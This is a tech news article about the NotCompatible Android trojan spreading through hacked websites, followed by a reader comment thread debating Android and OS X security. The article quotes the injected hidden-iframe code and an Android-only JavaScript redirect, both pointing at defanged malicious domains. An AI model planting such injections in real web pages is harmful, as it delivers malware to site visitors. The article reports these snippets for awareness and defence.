A first: Hacked sites with Android drive-by download malware

A first: Hacked sites with Android drive-by download malware

Summary: We've already seen websites that host Android drive-by download malware. Now, cyber criminals are experimenting with hacking legitimate websites to achieve the same means at a larger scale.


Cyber criminals often put drive-by download malware on websites they have hacked in order to quickly infect visitors' PCs. For the first time though, hacked websites with Android drive-by download malware have been discovered.

A new Trojan, called NotCompatible, appears to serve as a simple TCP relay while posing as a system update called named "Update.apk." It does not currently seem to cause any direct harm to a target Android device, but could potentially be used to gain access to private networks by turning an infected smartphone into a proxy.

IT administrators should note that a device infected with NotCompatible could potentially be used to infiltrate normally protected information or systems, such as those maintained by enterprises or governments. Security firm Lookout (via Reddit) describes how when a user visits a compromised website from an Android device, the malicious app is automatically downloaded.

Here's where it gets tricky: this attack requires further user interaction. Although Android lets you download and install apps from anywhere, in addition to the official Google Play store, this attack still has two requirements.

First of all, the Android device has to have sideloading on (the "Unknown sources" setting has to be enabled) or this won't work. Secondly, when the suspicious app finishes downloading automatically, the device will prompt the user to install it.

So, the device needs to be set to approve apps not from the Google Play store, and the user has to agree to install said app. The success of such an attack largely depends on user ignorance and the popularity of the affected sites.

Since the infected sites in question are showing relatively low traffic right now, the total impact on Android users is likely low. In other words, this is a viable way to mass attack Android devices, but it isn't being used as such just yet. It can, however, already be used for targeted attacks on individuals who then take their Android device to work with them.

I can't emphasize enough that the real news here is that hacked websites have been discovered. This shows that malicious individuals are experimenting so that they can one day pull this off on larger, more popular websites. Given that Android now accounts for 51 percent of the U.S. market share pie, I'm not surprised.

Now let's look at what this particular attack actually does. Hacked websites commonly have the following code inserted into the bottom of each page: <iframe style="visibility: hidden; display: none; display: none;" src="hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}"></iframe>

When a PC-based web browser accesses the site in question, it returns a "not found" error. When a browser with the word "Android" in its user-agent header accesses the site, however, the following is returned:

<html><head></head><body><script type="text/javascript">window.top.location.href = "hxxp://androidonlinefix.info/fix1.php";</script></body></html>

As a result, the browser immediately attempts to access the page at androidonlinefix.info. Like the previous site, only browsers with the word "Android" in their user-agent string will trigger a download; all other browsers will show a blank page. Since the server returns an Android app, the Android browser automatically downloads it.

Suspicious apps are currently being served from gaoanalitics.info and androidonlinefix.info, while the Command and Control (C&C) domain is notcompatibleapp.eu. "We're still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous," a Lookout spokesperson said in a statement. New sites can be hacked, and the C&C domain can of course change.

Personally, I think cyber criminals are testing to see how easy it would be to infect thousands if not millions of Android devices. Imagine the recently discovered fake Android apps (see links below) coupled with this drive-by download example. This could get ugly.

See also:

Topics: Mobility, Android, Security, Mobile OS, Malware, Hardware, Google, Browser, Apps, Smartphones

Emil Protalinski

About Emil Protalinski

Emil is a freelance journalist writing for CNET and ZDNet. Over the years,
he has covered the tech industry for multiple publications, including Ars
Technica, Neowin, and TechSpot.

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.


Log in or register to join the discussion
  • No doubt . . .

    . . . Android users who had a lot to say a few days ago about the OS X malware will now be sheepsihly hiding.
    • No...

      You'll hear it explained away by the fact that the user has to authorize installation (Mac users use the same defense when possible) and how you have to have sideloading enabled, so if you choose to do so, you're doing at your own risk (nevermind how often sideloading is touted as an advantage over other platforms).
      • And guess what...

        It's a proper explanation. And I notice you make no mention that the OS X attacks were done on a fully patched base system with no user intervention, as if that is how attacks these days are normally executed.
        Michael Kelly
      • And guess what....hipsters.

        @Michael Kelly

        It's a proper explanation for Android hipsters. Just like the Apple hipsters who content that it is not the platform, but non-hipster posers who use their platform that is the problem.

        If only there was some sort of way to keep the non-hipsters out of Android phones, the Android ecosystem would be a paradise.
        Your Non Advocate
      • Yep

        And Bozos will cal, this an accomplishment evwn though the OS X drive by required no user interaction at all!
    • Any system can be attacked

      The OS X malware attack was done on a base OS X system with all patches applied (though now a patch is available). Yes it was third party software, but it was packaged with the OS X original installation, and thus Apple's responsibility to reasonably maintain.

      These Android attacks are based on software installed from untrustworthy sites with the user having had to bypass normal security measures not once but twice. Any system can be attacked under such circumstances no matter how secure the operating system is. The only way to prevent it is to not allow the user to install anything unapproved (like iOS and very soon Metro) which in turn inhibits user freedom.

      Android does it the right way. You can choose to inhibit your freedom in return for security, or you can choose to be free and have to maintain security yourself. Unfortunately there is no solution which allows you to maintain total freedom and total security simultaneously.
      Michael Kelly
      • Right on.....

        Any system can be attacked and if someone finds zero-days they can get some head start on the security vendors and also when vulnerbilities are released and no patch is available thats a gold mine for hackers as you saw with OSX Flashback. Most attacks are targeted at patched vulnerabilities, and many fail to keep their systems patched and cause their own problems. But any OS can and will be hacked at some point especially those that are run by average joe citizen that is much easier to gain access over locked down enterprise servers and such. Which is why mobile will be the next huge batteground for malicious coders. People need to be vigilant in their internet habits and people can't just depend on the OS to defend them!
      • Sideloading with whitelists would cover it

        Of course the best practice is to leave the sideloading off except when you want to load particular apps or updates.
    • This is purely social engineering

      It has nothing to do with the security of the OS. In fact it proves that Android did the right thing by prompting. You could download any number of apps on any platform. If the OS warns you, it is your fault. Think UAC prompts on the PC. It is an omen for Android that they are not immune anymore either. Too many devices out there now.
      Lesson, for now, is turn off sideloading for users that don't know better and hope a real exploit doesn't creep up for a while.
      • It is off by default

    • No doubt you are just another apple fanboy

      Just why do you assume that it was Android users who had a lot to say about OS X malware? Why do feel the need to troll this topic with such an accusation?

      If you allow users the ability to install software from any source and the user chooses to enable that feature and then they choose to install a malicious app there's not much can be done about that. But, on the other hand, a closed system like Apple's would prevent the users from harming their systems by installing unapproved code... except, of course, when Apple fails to release a patch for a known vulnerability until after 600,000 users are infected. Had a third party not discovered the infection and reported it, there is no telling how long it would have taken users to get the patch. Feel better about your closed system security model now?

      How's that for sheepishly hiding?


      There are inherent trade offs in any capability given to a device. Dumb phones were inherently more secure but it was often touted as an advantage of smart phones to be able to run apps and access the Internet.
  • Wait? I thought Android was built on Linux?

    What happened to the LSM? Next thing people will be telling me is that the likelihood of attacks has a direct correllation to the install base. That, because there are a lot of Android phones, they are targeted. But, that can't be, can it?
    Your Non Advocate
    • And yet

      some people will stake their reputations on that claim.
      Tim Cook
      • And yet...

        this exploit relies on insecure phone setups and users who are genuinely stupid enough to click "Install" on something they didn't choose to download. The only real story here is all these websites getting hacked.
      • And yet......

        this exploit relies on the fact that the Android phone market is fragmented, being used by all sorts, including those who Want other content and enable that on Purpose and who know what they are doing, and still getting infecting.
        Are you a Google shill or what? You have to be getting money for trying to spin every one of these articles that are showing the Android and OS X OSes to be extremely vulnerable to attack in the hands of mainstream users.
        I guess Linux should have remained where it belonged....a nerd only hobby OS. Android is a mess. Google can't balance being on the side of open source and open access and turn arouind and force Jobsonian like lock-down on Android. They don't even have any say do they? It's free and open source that carriers and handset makers are simply using to create their own experiences, right? Google has no guiding hand and is not making money directly from Android, rigth? Or is Google going to say to hell with the open source community and build an iPhone Lite on motorola handset.
    • Just because SELinux source is in the kernel source

      That doesn't mean that it was enabled during the kernel build, nor does it mean it was enabled at boot time.

      To my knowledge, Android doesn't yet use the facility. It is my understanding that it may be in a following kernel.
      • Since Android is the largest target for Mobile Malware writers, why not?

        Being #1 for malware should encourage you to secure your platform.

        Your Non Advocate
      • hmm

        I thought there was one phone that had the SE Extensions on in Linux.
    • Couple of Problems with Your Jab

      The first problem is that just because Android is built on a Linux kernel does not make it the same operating system as classic GNU/Linux systems, so even if this were about a security hole in Android, it wouldn't reflect on regular Linux systems unless the exploit were in the kernel itself.

      The second problem is that no operating system is safe from Trojans installed by the system administrator. That is not an operating system security issue. It is a user naivety issue.

      The claims that better security in Linux was not about installed base used to be completely true. However, in recent years Windows security has improved a great deal. Currently, even on Windows most malware is user installed or uses a hole in a third party program instead of a security flaw in Windows itself.

      Because Windows security has improved so much a lot of people are now trying to say, 'See? It was all about the size of the install base.' That's nonsense. The difference now isn't that other install bases have gotten bigger; it's that Microsoft finally started to get their act together about security. Just the same, if a user/system administrator wants to install malware, you can't stop him without taking away his administrative rights.
      • Couple of problems with your rebuttals

        If it's not the same operating system as Linux, then people who routinely trot out the meme that Linux is the #1 platform because it is on routers, toasters, and mobile phones should add an * to the claim.

        The second problem is dead on. Comparing one systems overall security footprint against anothers based on actual infections due to user errors is foolish.

        And, yes...it is all about the install base and MS did improve their security. Just like Android needs to catch up.
        Your Non Advocate